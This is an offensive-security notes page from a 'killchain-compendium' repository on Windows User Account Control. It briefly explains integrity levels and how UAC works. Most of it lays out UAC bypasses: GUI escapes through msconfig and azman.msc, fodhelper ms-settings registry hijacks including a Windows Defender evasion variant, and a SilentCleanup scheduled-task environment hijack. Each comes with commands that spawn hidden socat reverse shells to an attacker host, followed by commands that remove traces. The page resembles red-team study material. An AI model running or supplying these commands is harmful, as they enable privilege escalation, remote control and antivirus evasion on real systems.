killchain-compendium/Post Exploitation/Windows/User Account Control.md

130 lines
4.8 KiB
Markdown
Raw Normal View History

2022-11-11 01:15:07 +01:00
# User Account Control
* Change permissions of a process or its resources
* Mandatory Integrity Control (MIC)
* Feature of MAC, assigns integrity level on permissions
* Low
* Medium
* High
* System
## Login Tokens
* Access tokens are given to users at login
* __Non Administrator Token__, integrity level low
* __Filtered Token__, stripped administrative permission, integrity level medium
* __Elevated Token__, elevates to integrity level high
## User Account Control Settings
* __Always notify__
* __Notify me only when programs try to make changes to my computer__, shows UAC dialogue
* __Notify me only when programs try to make changes to my computer (do not dim my desktop)__
* __Never notify__, never show UAC dialogue
## How UAC Works
Application Information Service, a.k.a Appinfo
* User requests elevated permissions
* `ShellExecute` API call is made via `runas.exe`
* Request to Appinfo
* Application manifest is checked if AutoElevation is set to on
* Appinfo runs `consent.exe`, dialogue opens up
* User clicks yes, token is checked. PPID of the newly created porcess will be pointed to the shell from which the request originates, while the login token is elevated. Otherwise it is denied
## Bypass
* UAC is seen as a convenience function, not a security function
* `Mandatory Label` is shown via `whoami /groups`
### GUI
#### msconfig
* Open `msconfig`, always got integrity level high via auto elevation
* On Tab `Tools` choose `Command Prompt` and press `Launch` to get an elevated `cmd.exe`
#### azman.msc
* Open `azman.msc` --> `Help` --> `Help Topics`
* Right click help article --> `view source`
* `Open` --> `File`, select `All Files`
* Dialogue opens up, go to `C:\Windows\System32\cmd.exe` and right click on it to open
#### Autoelevate Process
* Binary must be signed
* Must be in a trusted dir like `Program Files` or `Windows`
* Additionaly, portable executables need `autoelevate` in the manifest. Check via
```sh
sigcheck64.exe -m <portable_executable.exe>
```
* `mmc.exe` autoelevates depending on user request for msc-snapin
* Most `*.msc`s, `spinstall.exe`, `pkgmgr.exe` as well as [COM objects autoelevate](https://docs.microsoft.com/en-us/windows/win32/com/the-com-elevation-moniker)
### Commandline
#### Fodhelper.exe
* Default applications are stored in `HKEY_LOCAL_MACHINE\Software\Classes` which is superseded by the current user profile `HKEY_CURRENT_USER\Software\Classes`
* `ms-settings` ProgID is searched for by `fodhelper.exe`, this setting overrides system defaults of which executable opens the filetype
* The subprocess of `fodhelper.exe` inherits intergrity level high
* Open reverse shell on attacker and
```sh
whoami
net user <user> | find "Local Group"
whoami /groups | find "Label"
set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:$TARGET_IP:4444 EXEC:cmd.exe,pipes"
reg add %REG_KEY% /v "DelegateExecute" /d "" /f
reg add %REG_KEY% /d %CMD% /f & fodhelper.exe
```
* Clean up via
```sh
reg delete HKCU\Software\Classes\ms-settings\ /f
```
* When Windows Defender is enabled use [v3d3d's improvement for bypassing Windows Defender](https://v3ded.github.io/redteam/utilizing-programmatic-identifiers-progids-for-uac-bypasses)
```sh
$program = "powershell -windowstyle hidden C:\tools\socat\socat.exe TCP:$TARGET_IP:4445 EXEC:cmd.exe,pipes"
New-Item "HKCU:\Software\Classes\.pwn\Shell\Open\command" -Force Set-ItemProperty "HKCU:\Software\Classes\.pwn\Shell\Open\command" -Name "(default)" -Value $program -Force
New-Item -Path "HKCU:\Software\Classes\ms-settings\CurVer" -Force
Set-ItemProperty "HKCU:\Software\Classes\ms-settings\CurVer" -Name "(default)" -value ".pwn" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:$TARGET_IP:4445 EXEC:cmd.exe,pipes"
reg add "HKCU\Software\Classes\.thm\Shell\Open\command" /d %CMD% /f
reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".thm" /f
fodhelper.exe
reg delete "HKCU\Software\Classes\.thm\" /f
reg delete "HKCU\Software\Classes\ms-settings\" /f
```
### Scheduled Tasks
* UAC will not be triggered on scheduled tasks
* DiskCleanup calls `%windir%\system32\cleanmgr.exe /autoclean /d %systemdrive%`
* Set `%windir%` to a reverse shell via
```sh
reg add "HKCU\Environment" /v "windir" /d "cmd.exe /c C:\tools\socat\socat.exe TCP:$TARGET_IP:4711 EXEC:cmd.exe,pipes &REM " /f
schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
reg delete "HKCU\Environment" /v "windir" /f
```
### Automated Bypass
* [hfiref0x's automated bypass named UCAME](https://github.com/hfiref0x/UACME.git)
## Detection
* https://www.bleepingcomputer.com/news/security/bypassing-windows-10-uac-with-mock-folders-and-dll-hijacking/